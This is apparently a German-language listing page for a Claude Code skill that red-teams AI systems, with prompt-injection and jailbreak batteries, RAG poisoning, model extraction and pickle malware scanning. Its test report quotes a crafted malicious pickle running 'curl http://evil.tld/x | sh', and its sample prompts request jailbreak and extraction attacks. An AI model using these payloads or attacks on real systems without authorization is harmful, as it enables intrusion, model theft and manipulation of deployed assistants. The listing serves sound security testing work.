AI Security
Offensives Testen von LLM/ML-Systemen: Prompt Injection, RAG Poisoning, Pickle-Modell-Scanning
Getestet · Funktioniert
Was es kann
Eine Offensive-Security-Skill für das Red-Teaming von AI/ML-Systemen: Prompt Injection und Multi-Turn-Jailbreak-Batterien, RAG/Vector-DB-Poisoning, MCP/Agent-Tool-Poisoning-Audits, Pre-Load-Pickle-Modell-Malware-Scanning und Black-Box-Modell-Extraktions-/Membership-Inferenz-Probes, mit OWASP LLM Top-10 und MITRE ATLAS Mappings. Wird ausgelöst, wenn ein Benutzer darum bittet, ein LLM, einen Chatbot, eine RAG-Pipeline, einen MCP-Server oder ein heruntergeladenes Modellartefakt anzugreifen, zu red-teamen oder zu auditieren. Enthält fünf ausführbare Python-Skripte plus fünf Referenz-Deep-Dives, die auf spezifische CVEs von 2024-2025 zugeschnitten sind.
Testbericht
skills/ai-security/SKILL.md abgerufen und 3 gebündelte Dateien (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) stichprobenartig überprüft – alle HTTP 200. Für die AUSGABE habe ich die nur-stdlib-Skripte/model_scan.py des Skills gegen von mir erstellte Pickles ausgeführt: ein bösartiges mit __reduce__ -> os.system("curl http://evil.tld/x | sh"), ein gutartiges und ein gutartiges, dessen Daten lediglich die Zeichenfolgen "operating_system"/"subprocess" enthielten. Die Baseline (naives Byte-Grep) kennzeichnete die bösartige Datei, aber auch FALSCH-POSITIV die gutartige Label-List-Datei. Der Skill zerlegte Pickle-Opcodes über pickletools, löste posix.system über REDUCE-Erreichbarkeit als eine verweigerte aufrufbare Funktion auf (strukturiertes JSONL: severity high, CWE-502, AML.T0011, exit code 2 als CI-Gate) und löschte beide gutartigen Dateien korrekt. Die Installation in einem sauberen mktemp HOME wurde verifiziert, wobei SKILL.md unter ~/.claude/skills/ai-security/SKILL.md platziert wird.
Getestet am: 2026-07-31 · Claude Code 2.x (agent harness)
Installation
git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src mkdir -p ~/.claude/skills cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security # Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/). # Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers; # promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint. # Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone): # /plugin marketplace add hypnguyen1209/offensive-claude # /plugin install offensive-claude@offensive-claude-marketplace # NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.
Befehle & Beispiel-Prompts
/ai-securityOffensives Testen von LLM/ML-Systemen: Prompt Injection, RAG Poisoning, Pickle-Modell-Scanning
Skills reagieren auf normale Anfragen — keine Slash-Befehle nötig. Nach der Installation aktivieren Prompts wie diese den Skill (auf Englisch):
Test this model against known jailbreak techniquesCheck this RAG pipeline for vector poisoningRun a model extraction attack against this API